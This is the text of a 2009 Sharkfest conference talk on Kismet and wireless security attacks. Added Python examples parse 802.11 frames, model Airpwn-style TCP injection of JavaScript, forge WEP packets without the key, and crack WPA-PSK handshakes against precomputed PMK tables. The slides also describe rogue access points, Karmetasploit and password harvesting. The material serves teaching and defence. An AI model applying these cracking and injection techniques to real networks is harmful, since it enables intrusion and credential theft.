SHARKFEST '09 | Stanford University | June 15–18, 2009

Wifi Security, Sharkfest '09

Mike Kershaw, Kismetwireless.net

Who?

• Mike Kershaw (sometimes aka Dragorn)
• Random OSS security developer (Kismet, Lorcon, Spectools, other stuff)
• Software Engineer at Aruba Networks in the Aruba Threat Labs and Aruba OSS Labs

The Plan

• Speed-View of Old Kismet (boring)
• New Kismet (the good stuff)
• Spectrum Analysis
• 802.11 Injection and Attacks
• Future work
• Q&A (aka "Audience does my work for me")

Origins of Kismet

• Summer of 2001, Airsnort released for Prism2 cards
• Modified it to show SSIDs
• Asked if they wanted patches. They didn't.
• Got a Cisco card which didn't talk prism2 netlink anyhow
• Winter 2001, first Kismet release

How Kismet does its voodoo

• Kismet places the device in monitor mode, aka rfmon
• Not the same as promiscuous mode: a promiscuous managed-mode interface still delivers only data frames, translated to Ethernet, for the BSS it is associated to; rfmon needs no association at all
• Raw 802.11 frames with the headers intact, management and control frames included
• Gives us all packets the card sees on the tuned channel, regardless of frame type or channel overlap

The voodoo that it do (2)

• Seeing all the packets lets us:
  – Detect networks, even "cloaked" networks
  – Detect clients
  – Act as an 802.11 layer-2 IDS
  – Collect and decode/decrypt at a later date
  – Be a completely undetectable passive observer

Hello, my name is 802.11

• Detecting 802.11
• It's really easy to do. Really easy.
• Networks are fundamentally noisy.
• "Look at me! I'm a network! This is my name! Come talk to me!"
• Even weird networks with squelched beacons chat when someone joins
• Cloaked networks? Not so much.

I'd like to talk to you

• Detecting 802.11 clients is as easy as detecting networks, in monitor mode
• If a client is talking to a network, you'll see it.
• Clients also broadcast probe requests for every network they remember: "I'm looking for SomeHighProfileDotCom, are you my mommy?"

Don't do that

• Snort is a great OSS IDS but doesn't have many rules for 802.11 layer 2
• Kismet already looks at all the packets anyhow
• Stateless IDS (fingerprints)
• Stateful (trends over time)
• Flooding, DHCP abuse, fuzzing/driver attacks, spoofing, etc.

The boring UI

[screenshot]

Still Boring

[screenshot]

Kismet-Newcore

• Project name of a total rewrite of the Kismet base, now Kismet-2009-05-RC2 and newer (hooray, releases!)
• Primary goal: fix complaints about Kismet usability, config difficulties, etc.
• Old code "grew"; new code is designed

New stuff in Newcore

• Simpler configs
• Live adding of sources
• Smarter remote capture
• Better error handling
• New user interface
• Better IDS
• Plugins!

The exciting UI

[screenshot]

More excitement

[screenshot]

Further Thrills

[screenshot]

Configuring Kismet

• Much easier now!
• New security model similar to Wireshark's: only the capture helper is setuid, and it is restricted to the 'kismet' group, so add users to that group instead of running everything as root
• Source types autodetected in most situations
  – ncsource=wlan0
• Run-time source adding
• Run-time configuration of UI

Live Export

• Virtual network device with tun/tap
• Fake 802.11 NIC
• Realtime export for any pcap-aware tool (wireshark, snort, packet-o-matic)
• Aggregate local and remote sources
• Homogenize packet headers

Plugins (not airfresheners)

• Can do anything Kismet can do
• Define new capture sources and protocols (DECT? Zigbee? Spec-An?)
• Add new commands, IDS, logs
• Add new widgets to the user interface
• Visualize custom data

Kismet + DECT

• http://www.dedected.org
• Com-On-Air DECT PCMCIA
• Sniff cordless phones
• Adds a full non-802.11 protocol to Kismet in plugins (in 800 lines!)
• Server and client plugins for logging and display

Kismet + DECT (2)

[screenshot]

Kismet + Spec-An

• Spectrum analysis
• Uses Wi-Spy from MetaGeek
• Logs spectrum data to a PPI spectrum header in the pcap file
• Display spectrum in Kismet UI
• Correlate network events with spectrum history

Kismet + Spec-An (2)

[screenshot]

Mapping

• Old map code kind of useless
• New map code in progress
• Works with "popular map service", rhymes with "Foogle"
• Arbitrarily large images
• International support

Mapping Oslo

[screenshot]

Mapping Zoom

[screenshot]

Picking a Platform

• If you can, Linux is the best bet
  – It's what I use, and it's what Kismet is written on
• LiveCD distros like Backtrack are easy
• Most cards have in-kernel drivers
• Some out-of-kernel drivers may still be needed (ralink 11n)

Pick a platform (2): Windows

• AirPcap is a must
• Only device with monitor mode on Windows with public drivers
• May be possible to hack other drivers from commercial sniffers, but I like not being sued
• CACE supports OSS. Yay!

Pick a platform (3): OSX

• Airport drivers work (Broadcom, Atheros, with Apple drivers)
• Old Airport classic don't really work anymore
• USB will not work
• KisMac can do USB, but is unrelated to Kismet, uses embedded non-portable drivers

Pick a Platform (4): Faking it

• Kismet requires direct access to hardware with native drivers
• Virtualization with USB passthrough can work (VMWare, KVM, Parallels, Virtualbox)
• No way to use cardbus/pci/internal/pcmcia cards.

Related Tools

• Spectools
  – Spectrum Analysis for Cheap
  – Curses, GTK, network
  – Userspace USB drivers for Wi-Spy
• Lorcon
  – Loss Of Radio Control
  – Homogenizing injection across platforms
  – Same API for all drivers

Spectools

• GPL drivers for Wi-Spy
• Developed with support from MetaGeek; they "get" open source!
• Works with all 3 Wi-Spy devices
• Network-compatible with Windows
• Find non-802.11 interference like jamming attacks

Spectrum Sniffing

[screenshot]

Sniffing 5GHz

[screenshot]

LORCON

• Platform and driver neutral
• Every driver has quirks: do you write raw packets? Rtap? Prism? Big endian? Host endian?
• Most injection tools were custom written for specific (now outdated) drivers

LORCON (2)

• Josh Wright and I decided per-driver custom apps suck
• Any app using LORCON should work with any driver
• Functional modes provide "best fit"
• Basic packet crafting library
• Basic packet dissection (strip custom headers)

LORCON (3)

• Ported several apps to LORCON as proof-of-concept
• AirPwn running on Windows with AirPcap TX? Sure, why not.
• Raw packets with Metasploit? Sounds like a good idea!
• http://802.11ninja.net

Security Snake Oil: Cloaking

• SSID cloaking tries to hide the network SSID so that clients which don't already know the name can't find it and connect
• Operative word: tries
• SSID is not a protected field!
• "Cloaking" simply blanks the SSID in beacons; it is still sent in the clear in probe requests, probe responses and association requests
• Good thing we see all the packets then!

Snake Oil: Cloaking (2)

• Network->All: "I'm a network!"
• Client->All: "I'm looking for a few good networks. Who are you?"
• Network->All: "Not gonna tell you."
• OtherClient->Network: "I want to join SomeCloakedNet"
• Network->OtherClient: "That sounds like me, come on in."

Snake Oil: Cloaking (3)

• All we have to do is wait for a client to join the network and capture the probe request/response or the association request; all of them carry the SSID
• Waiting sounds boring. I don't like boring.
• How about we send a packet from the network, to everyone, saying "Get out"?

Snake Oil: Cloaking (4)

• FakeNet->All: "Get out, now."
• All: "Oh no! I need to find a network!"
• Client->Network: "I'm looking for SomeCloakedNet again."
• Network->Client: "Sure, come on in."
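The frames in the last four slides, and the raw rfmon view from "How Kismet does its voodoo", as an added example (this is not Kismet code): a parser for 802.11 management frames plus a tracker that learns a cloaked SSID from the probe request and association request and raises an alert on a broadcast deauthentication. BSSID, client address, SSID and reason code are constructed, no radiotap header is assumed (strip it first on a real capture; its length is at bytes 2-3), and nothing is transmitted.

```python
"""Parse raw 802.11 management frames (what rfmon delivers) and track what they leak."""
import struct

MGMT = 0
SUBTYPE = {0: "assoc-req", 4: "probe-req", 5: "probe-resp", 8: "beacon",
           10: "disassoc", 12: "deauth"}
# Fixed (non-IE) fields that precede the information elements in each body
FIXED_LEN = {"beacon": 12, "probe-resp": 12, "assoc-req": 4, "probe-req": 0}
BROADCAST = b"\xff" * 6
SSID_IE = 0


def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(body):
    """Information elements are TLVs: id(1) len(1) value."""
    ies = {}
    while len(body) >= 2:
        eid, ln = body[0], body[1]
        ies[eid] = body[2:2 + ln]
        body = body[2 + ln:]
    return ies


def parse_frame(frame):
    """Return a dict for a management frame, or None for data/control frames."""
    fc, _dur, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    if ((fc >> 2) & 3) != MGMT:
        return None
    name = SUBTYPE.get((fc >> 4) & 0xF)
    if name is None:
        return None
    body = frame[24:]
    info = {"subtype": name, "da": mac(a1), "sa": mac(a2), "bssid": mac(a3)}
    if name in FIXED_LEN:
        ssid = parse_ies(body[FIXED_LEN[name]:]).get(SSID_IE)
        if ssid is not None:
            info["ssid"] = ssid.decode(errors="replace")
            # "Cloaked" beacons carry an empty or all-NUL SSID.  (In a probe
            # request an empty SSID is only a wildcard probe.)
            info["cloaked"] = len(ssid) == 0 or set(ssid) == {0}
    elif name == "deauth":
        info["reason"] = struct.unpack("<H", body[:2])[0]
    return info


class Tracker:
    """Kismet-style state: networks, what clients probe for, simple layer-2 alerts."""

    def __init__(self):
        self.networks = {}   # bssid -> SSID, or None while still hidden
        self.probes = {}     # client -> set of SSIDs it asked for by name
        self.alerts = []

    def feed(self, frame):
        f = parse_frame(frame)
        if f is None:
            return
        st = f["subtype"]
        if st == "beacon":
            if f.get("cloaked"):
                self.networks.setdefault(f["bssid"], None)
            else:
                self.networks[f["bssid"]] = f["ssid"]
        elif st == "probe-req":
            if f.get("ssid"):            # non-wildcard: the client names the network
                self.probes.setdefault(f["sa"], set()).add(f["ssid"])
        elif st in ("probe-resp", "assoc-req"):
            # The SSID travels in the clear here even when beacons hide it
            if f.get("ssid") and not f.get("cloaked"):
                self.networks[f["bssid"]] = f["ssid"]
        elif st == "deauth" and f["da"] == mac(BROADCAST):
            self.alerts.append(f"broadcast deauth from {f['sa']}, reason {f['reason']}")


# Frame builders for the constructed sample capture
def mgmt_header(subtype, da, sa, bssid, seq=0):
    return struct.pack("<HH6s6s6sH", (MGMT << 2) | (subtype << 4), 0, da, sa, bssid, seq << 4)


def ie(eid, value):
    return bytes([eid, len(value)]) + value


def beacon(bssid, ssid):                        # ssid=b"" -> cloaked network
    fixed = struct.pack("<QHH", 0, 100, 0x0411)  # timestamp, interval, capabilities
    return mgmt_header(8, BROADCAST, bssid, bssid) + fixed + ie(SSID_IE, ssid) + ie(3, b"\x06")


def probe_req(client, ssid):
    return mgmt_header(4, BROADCAST, client, BROADCAST) + ie(SSID_IE, ssid)


def assoc_req(client, bssid, ssid):
    return mgmt_header(0, bssid, client, bssid) + struct.pack("<HH", 0x0411, 10) + ie(SSID_IE, ssid)


def deauth(bssid, reason=7):                    # the "get out, now" frame, addressed to all
    return mgmt_header(12, BROADCAST, bssid, bssid) + struct.pack("<H", reason)


def demo():
    ap, client = bytes.fromhex("00112233aabb"), bytes.fromhex("00aabbccdd01")  # constructed
    t = Tracker()
    t.feed(beacon(ap, b""))                           # network: "not gonna tell you"
    t.feed(probe_req(client, b"SomeCloakedNet"))      # client: "I'm looking for SomeCloakedNet"
    t.feed(assoc_req(client, ap, b"SomeCloakedNet"))  # network: "that sounds like me, come on in"
    t.feed(deauth(ap))                                # what a forged "get out" looks like on the air
    return t
```

After demo() the tracker has the hidden network's name from the association request, the client's probe list, and one alert for the broadcast deauthentication; the same three checks are what a layer-2 IDS keys on.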

Snake Oil (5): MAC Filters

• "But", someone says, "I don't need to turn on crypto, I have MAC filters!"
• No
• Oh, that's the MAC of your client? I'll just be joining now, thanks
• Besides, none of your data is encrypted
• You'll find out why this is a bad thing

Gut-Punching 802.11

• Absurdly easy
• Management frames are completely unprotected: deauth and disassociate are accepted from anyone who can spoof the source address (802.11w management frame protection was only ratified later in 2009 and was not in shipping clients or APs)
• It's shared media
• All the bad old days for layer 2 attacks live again
• I don't have to own the Internet, I own your Internet

Strangers with candy

• Avoiding hostile networks requires users to be smart; users are bad decision makers
• The OS won't help; most like to join networks they've joined before
• Networks go "viral" and appear everywhere
• It's hard to tell what's real

Catch the virus

• "HP setup", "Free Public Wifi"
• Once Windows has seen a network, it wants to see it again
• Can't find it? Make an ad-hoc network!
• I like free. I like wi-fi. Let me join!
• Now another system will advertise it

Free public wiffey

• Create AP named "Free Public Wifi"
• Run "dnsmasq"
• ????
• Profit!
• Windows happily joins the network
• Why yes, I am your POP3 server. Why thank you for that password.

Making things worse: Karma

• Creating access points manually is really kind of a pain
• Isn't there an easier way?
• Modified drivers respond for every network requested
• "Are you FreePublicWifi?" Sure
• "Are you MyCorpNet?" Why not?

Even worse: Karmetasploit

• Karma + Metasploit + Airbase
• Become any AP. Become EVERY AP
• Answer all DNS queries
• Spoof common services like HTTP
• Record all logins
• You wanted Facebook? How about I give you all the browser exploits instead. Tasty!

Man-in-the-Middle

• Why just spoof HTTP? Why not give you a real connection and let you log in? (and then read your email)
• SSL? Just give them a fake cert. A user would never accept one of those, right?
• "You encrypted the login, but you didn't move the bodies!"

Ignoring the network

• You know, after all, setting up this whole network framework just to attack a client is a big hassle
• Let's just rewrite their traffic in the air and own them that way
• Airpwn is underappreciated; not just for serving shock-porn anymore!

Creative editing

• Lots of sites include little stubs of JS
• Rhymes with "ShmaceHook" and "FlyMace" and "Glitter"
• Why not "enhance" them?
• Once you have JS exec inside the page domain, you win
• Layer 2 hijacking of open and WEP data

Free candy inside

• Client->Server: "Give me a connection to 1.2.3.4:80"
• Attacker->Client: "I'm 1.2.3.4:80!"
• Attacker->Server: "I'm Client! I changed my mind."
• Attacker->Client: "Have some candy"

Constant interruptions

• Client->Server: "I want 1.2.3.4:80"
• Server->Client: "OK"
• Client->Server: "Give me /foo.js"
• Attacker->Client: "I'm Server, here's foo.js"
• Attacker->Server: "I'm Client. Go home."

Not done yet

• Client->Server: "I want 1.2.3.4:80 /foo.js"
• Server->Client: "Here's foo.js"
• Attacker->Client: "No, no, there's more."
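The three exchanges above as an offline model, added here and not Airpwn's code: one sniffed request segment gives the attacker the sequence and acknowledgement numbers needed to forge the server's reply and a reset for the server, and the client's TCP stack keeps whichever data segment arrives first at the expected sequence number. Addresses, initial sequence numbers and the JavaScript payload are constructed; window handling, retransmission and checksums are left out, and nothing is sent on a socket.

```python
"""Airpwn-style injection as a TCP race, modelled offline."""
from dataclasses import dataclass, field


@dataclass
class Segment:
    src: str
    dst: str
    seq: int
    ack: int
    flags: str
    payload: bytes = b""


@dataclass
class ClientConn:
    """Receive side of the client's connection, simplified: in-order delivery, no window."""
    rcv_nxt: int   # next byte the client expects from the server
    snd_nxt: int   # next byte the client will send
    received: bytearray = field(default_factory=bytearray)

    def deliver(self, seg):
        """Accept a data segment only if it starts exactly at rcv_nxt; anything else
        looks like an old duplicate and is discarded."""
        if seg.seq != self.rcv_nxt or not seg.payload:
            return False
        self.received += seg.payload
        self.rcv_nxt += len(seg.payload)
        return True


def forge_for_request(req, body):
    """Build both halves of the attack from one sniffed request: a response the client
    takes as the server's, and a RST so the server abandons the connection."""
    http = (b"HTTP/1.1 200 OK\r\n"
            b"Content-Type: application/javascript\r\n"
            b"Cache-Control: max-age=31536000\r\n"      # long-lived: the payload outlives this network
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"Connection: close\r\n\r\n" + body)
    req_end = req.seq + len(req.payload)
    # "I'm Server, here's foo.js": our seq is what the client last acked, we ack its request
    to_client = Segment(req.dst, req.src, seq=req.ack, ack=req_end, flags="PA", payload=http)
    # "I'm Client. Go home.": a reset in the client's name at its current send position
    to_server = Segment(req.src, req.dst, seq=req_end, ack=req.ack, flags="R")
    return to_client, to_server


def race(attacker_first):
    """Replay the exchange from the slides; returns ([accepted?, ...], bytes the client got)."""
    client = ClientConn(rcv_nxt=4000, snd_nxt=1000)             # constructed sequence numbers
    req = Segment("client", "1.2.3.4:80", seq=client.snd_nxt, ack=client.rcv_nxt, flags="PA",
                  payload=b"GET /foo.js HTTP/1.1\r\nHost: 1.2.3.4\r\n\r\n")
    client.snd_nxt += len(req.payload)
    evil, _rst = forge_for_request(req, b"alert('owned');")
    real = Segment("1.2.3.4:80", "client", seq=req.ack, ack=client.snd_nxt, flags="PA",
                   payload=b"HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nvar x = 1;")
    order = [evil, real] if attacker_first else [real, evil]
    return [client.deliver(s) for s in order], bytes(client.received)
```

race(True) is the slide: the forged segment is accepted and the genuine one is dropped as a duplicate; race(False) shows the attacker losing when the real server answers first, which is why the injector has to sit close to the client and why this needs open or WEP traffic (the attacker must read the sequence numbers off the air).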

Now I'm in your browser...

• ... Rewriting your DOM
• What can we do? Anything we want
• Rewrite the page DOM to strip HTTPS
• Redirect links
• Replace text and images
• Send cookies to a remote system
• Remote-control the browser to do other stuff

But it's just a little javascript

  // Injected script: find the headline image and text blocks by class name and
  // replace their contents.  (The replacement markup is elided on the slide.)
  var embeds = document.getElementsByTagName('div');

  for (var i = 0; i < embeds.length; i++) {
    if (embeds[i].getAttribute("class") == "cnnT1Img") {
      embeds[i].innerHTML = "...";
    } else if (embeds[i].getAttribute("class") == "cnnT1Txt") {
      embeds[i].innerHTML = "...";
    }
  }

Cold, hard cache

• Discovered by Robert Hansen with VPNs
• Feed a client some javascript
• Set cache to infinity
• What happens when they go back to corporate HQ and load that?
• Yup... I just started running JS inside your corpnet a day later

Funeral for WEP

• Who here uses WEP?
• If you raised your hand, now I'm going to yell
• WEP is flawed
• Very flawed
• Fatally flawed
• The corpse is stinking, bury it before the neighbors freak out

Breaking WEP

• Used to take hours and hundreds of thousands of packets
• Now takes minutes and as few as 20,000 packets (PTW attack)
• ARP injection is obvious but works really well
• Or just wait!
• Kismet-PTW plugin autocracks

No, seriously

  Starting PTW attack with 29645 ivs.
  KEY FOUND! [ 59:69:6E:67:57 ] (ASCII: YingW )
  Decrypted correctly: 100%
  real 0m0.708s

Cracked WEP in the wild with 30,000 ARP packets in less than a second; it took less than 2 minutes to generate the packets via ARP injection.

WEP is so cheap to crack there is no reason not to try every 100 packets to see if there is enough statistical data to crack it now.

Home away from home

• Why wait for a client to find a network?
• Caffe Latte attack uses only the client
• Rewrite its ARP request into an ARP reply, send it back to the client, repeat
• Cracked WEP and owned client in an airport. Or a bus. Whatever
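The two structural flaws behind the last three slides, as an added example (not Kismet, aircrack or Caffe Latte code): the WEP ICV is a CRC32 under a stream cipher, so an encrypted packet can be edited and its ICV repaired without the key, and a packet with predictable content such as an ARP request gives up the RC4 keystream for its IV, which then encrypts anything of that length. Key, IV and the ARP packet are constructed and the 802.11 header is omitted; only the encrypted frame body is modelled.

```python
"""WEP frame bodies: RC4 + CRC32 ICV, and what can be done to them without the key."""
import struct
import zlib

KEY = b"ABCDE"                 # constructed 40-bit key
IV = b"\x01\x02\x03"           # constructed IV
LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"


def rc4(key, data):
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # keystream generation, XORed in
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key, iv, plaintext):
    """Body = IV(3) | key id(1) | RC4(IV || key, plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key, body):
    """Return the plaintext, or None if the ICV fails (a real receiver drops it silently)."""
    pt = rc4(body[:3] + key, body[4:])
    data, tag = pt[:-4], pt[-4:]
    return data if icv(data) == tag else None


def flip_without_key(body, delta):
    """XOR `delta` into the plaintext of an encrypted body and repair the encrypted ICV.
    No key needed: RC4 is a stream cipher, so flipping a ciphertext bit flips the same
    plaintext bit, and CRC32 is affine: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros)."""
    n = len(body) - 8                          # 4 header bytes, 4 ICV bytes
    assert len(delta) == n
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    ct = bytes(c ^ d for c, d in zip(body[4:4 + n], delta))
    tag = bytes(c ^ d for c, d in zip(body[4 + n:], struct.pack("<I", icv_delta)))
    return body[:4] + ct + tag


def recover_keystream(body, known_plaintext):
    """ARP is predictable, so one captured packet yields the keystream for its IV."""
    return bytes(c ^ p for c, p in zip(body[4:], known_plaintext + icv(known_plaintext)))


def forge_with_keystream(iv, keystream, plaintext):
    """Encrypt an arbitrary packet under a known (IV, keystream) pair, still without the key."""
    pt = plaintext + icv(plaintext)
    assert len(pt) <= len(keystream)
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(pt, keystream))


def arp_request():
    """LLC/SNAP + ARP request from 10.0.0.5 asking who has 10.0.0.1 (constructed)."""
    sender = bytes.fromhex("00aabbccdd01")
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      sender, bytes([10, 0, 0, 5]), bytes(6), bytes([10, 0, 0, 1]))
    return LLC_SNAP_ARP + arp


def demo_flip():
    """Caffe Latte style edit: turn a captured encrypted ARP request into an ARP reply."""
    body = wep_encrypt(KEY, IV, arp_request())
    delta = bytearray(len(arp_request()))
    delta[15] = 1 ^ 2                          # ARP opcode low byte: 8 bytes LLC/SNAP + offset 7
    return wep_decrypt(KEY, flip_without_key(body, bytes(delta)))


def demo_forge(plaintext):
    """Keystream reuse: forge a packet for the same IV with no key at all."""
    body = wep_encrypt(KEY, IV, arp_request())
    ks = recover_keystream(body, arp_request())
    return wep_decrypt(KEY, forge_with_keystream(IV, ks, plaintext))
```

demo_flip() returns the edited packet as the legitimate receiver decrypts it: opcode 2, ICV valid. Every client reply to such a packet is another fresh IV for PTW, which is the whole engine of the attack; edit a byte without the ICV repair and wep_decrypt returns None, which is the only check WEP ever makes.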

Attacking WPA

• At least it's better than WEP
• WPA-PSK is only as secure as the passphrase
• Passphrase and SSID (with its length) are hashed into the PMK: PBKDF2-HMAC-SHA1 with the SSID as the salt, 4096 iterations, 256-bit output
• The PMK is mixed with both MAC addresses and the two handshake nonces to make a per-session PTK for each user
• Computing a PMK is expensive by design (4096 HMAC-SHA1 rounds); that cost is the only thing slowing guessing down

Look it up

• Computing PMK takes a while
• So let's calculate the PMK for every dictionary word plus the top 1000 SSIDs
• Dictionary lookups are fast
• Tables are big, but so what?
• We can accelerate with CUDA and FPGA
• A table only covers the SSIDs it was built for; an unusual SSID pushes the attacker back to a full PBKDF2 per guess, but does nothing against a weak passphrase
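The key hierarchy from the last two slides and the table lookup against it, as an added example (not coWPAtty or Kismet code): PMK from passphrase and SSID, PTK from the PMK and the handshake values, the MIC a passive listener sees in handshake message 2, and a cracker that checks candidates against a PMK table precomputed for a list of common SSIDs. MACs, nonces, the wordlist and the "top SSIDs" list are constructed, and the EAPOL frame is a stand-in rather than a byte-exact 802.1X frame; pmk_from_passphrase itself reproduces the IEEE 802.11i Annex test vector (passphrase "password", SSID "IEEE").

```python
"""WPA-PSK key hierarchy and the dictionary/table attack against it."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The SSID is the salt, which is why precomputed tables are built per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11i PRF-512: HMAC-SHA1 over label || 0x00 || data || counter."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK is per session: both MAC addresses and both handshake nonces go in."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP EAPOL-Key MIC: HMAC-SHA1 with the KCK (first 16 PTK bytes), truncated to 16."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_handshake(ssid, passphrase, aa, spa, anonce, snonce):
    """Both sides of the 4-way handshake reduced to what a passive observer gets:
    message 2 carries SNonce plus a MIC over the EAPOL frame with its MIC field zeroed.
    The EAPOL bytes are a constructed stand-in, not a byte-exact 802.1X frame."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    eapol = b"\x01\x03" + snonce + bytes(16)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


def build_pmk_table(ssids, wordlist):
    """The slow step (4096 HMAC rounds per entry), done once per (SSID, word) and kept."""
    return {(s, w): pmk_from_passphrase(w, s) for s in ssids for w in wordlist}


def crack(handshake, wordlist, table=None):
    """Offline: with the PMK in the table, a candidate costs one PRF and one HMAC."""
    table = table or {}
    for word in wordlist:
        pmk = table.get((handshake["ssid"], word)) or pmk_from_passphrase(word, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["aa"], handshake["spa"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return word
    return None


TOP_SSIDS = ["linksys", "default", "NETGEAR"]                  # stand-in for "the top 1000 SSIDs"
WORDLIST = ["password", "letmein1", "sharkfest", "wireless1"]  # constructed dictionary
AP_MAC, STA_MAC = bytes.fromhex("001122334455"), bytes.fromhex("00aabbccdd01")  # constructed
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))        # constructed, fixed for reproducibility


def demo():
    """Capture a handshake for a network on a common SSID and run it against the table."""
    hs = build_handshake("linksys", "sharkfest", AP_MAC, STA_MAC, ANONCE, SNONCE)
    table = build_pmk_table(TOP_SSIDS, WORDLIST)
    return crack(hs, WORDLIST, table)
```

demo() recovers the passphrase from the table without a single PBKDF2 call at crack time. Run the same handshake for an SSID not in the table and crack() falls back to computing PBKDF2 per guess: slower, but a weak passphrase still falls.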

Attacking TKIP

• TKIP was a stop-gap before 11i
• TKIP is RC4. Wait. Isn't WEP RC4?
• So doesn't... TKIP suck?
• Kind of. They made it better
• Per-packet keying, replay prevention, passphrase conversion standards, PTK renegotiation

Countermeasures

• TKIP includes MIC (Michael) countermeasures
• An invalid MIC makes the network go sulk in the corner and reset
• Two MIC failures within 60 seconds trigger countermeasures: the AP deauthenticates every station and refuses TKIP associations for 60 seconds
• We can still guess, but we have to guess slowly

Unintended side effects

• QoS (802.11e) was defined after TKIP
• It can re-order packets, so each QoS queue keeps its own replay counter
• This means we can re-use a packet captured on one queue in the other queues, whose counters are still lower
• Four commonly used, but 12 more available

Chop chop!

• Cut the last byte off the packet
• Fix the checksum: the ICV is a CRC32, so a guess for the chopped byte can be turned into a corrected ICV without the key
• Inject
• If we're wrong, the ICV check fails and nothing happens
• If we're right, the ICV passes but the Michael MIC fails, and the client sends a MIC failure report: our "spoof alert"
• Wait 60 seconds, start on next byte

Not quite dead yet

• Not a complete break; slow, only gets us a few packets
• Once we get a few we could initiate a connection outside though...
• Beginning of the end
• Switch to WPA2 now before someone finishes the job on WPA1

Attacking WPA-EAP

• Better than WPA-PSK
• Commonly found on corporate networks
• Many methods use PKI/TLS (SSL certificates)
• No good way to distribute certs to all clients at an institutional level
• Spotty OS clients

I am who I say I am

• If UAC isn't used, deciding "good" certs can be in the hands of users
• Users always make good decisions, right?
• That SSL cert says "Veri$ign", good 'nuff! (This is actually optimistic)
• Obviously that tennis player wants me to see her naked!

Even the smart ones...

• Often the OS supplicant isn't helpful
• May not show all of the cert
• Even if it does... self-signed vs real?
• If two certs have a common root (Verisign?) the CN may not be compared anyhow
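The supplicant-side fix for the last two slides, as an added wpa_supplicant.conf example (not from the talk): the first network block validates nothing, the second pins the organisation's own CA and requires the RADIUS server's name, so a certificate that merely chains to a public root is refused before any MSCHAPv2 exchange happens. SSID, identity, password, CA path and server name are placeholders, and the option names are those of current wpa_supplicant releases.

```conf
# Weak: no ca_cert, so wpa_supplicant accepts whatever certificate the
# "RADIUS server" presents; a rogue AP with any cert gets the MSCHAPv2 exchange.
network={
    ssid="MyCorpNet"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
}

# Hardened: trust only the organisation's own CA, and require the server
# certificate to name the real RADIUS host, so a cert that only chains to a
# public root (the "Veri$ign, good 'nuff" case) is rejected by the supplicant,
# not left to the user.
network={
    ssid="MyCorpNet"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    anonymous_identity="anonymous@corp.example"
    password="placeholder-password"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
}
```

The anonymous_identity keeps the real username out of the cleartext outer EAP identity; the two ca_cert/domain_suffix_match lines are what turn "the user decides" into "the supplicant decides".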

Of course you're you

• Josh Wright and Brad Antoniewicz wrote a FreeRADIUS variant (FreeRADIUS-WPE) that accepts all logins
• Spoof a network and advertise PEAP
• "Cert looks good to me!"
• Combine with KARMA, own everyone who connects
• Harvest passwords

1 2 3 4 5

• PEAP hands us the password as an MSCHAPv2 challenge/response, which can be cracked offline
• If only there were a tool for that... like L0phtCrack
• Users also pick bad passwords
• That's the same password as my luggage!

Future Plans

• More non-802.11 plugins (Zigbee, RFID)
• More IDS
• Integrate WPA-PSK decryption
• Integrate WPA-EAP decryption with provided certificates

Thanks, Q&A, Live Demo

• Thanks to CACE for having Sharkfest!
• Thanks to everyone who has helped test Kismet-Newcore on the long road to release

Q&A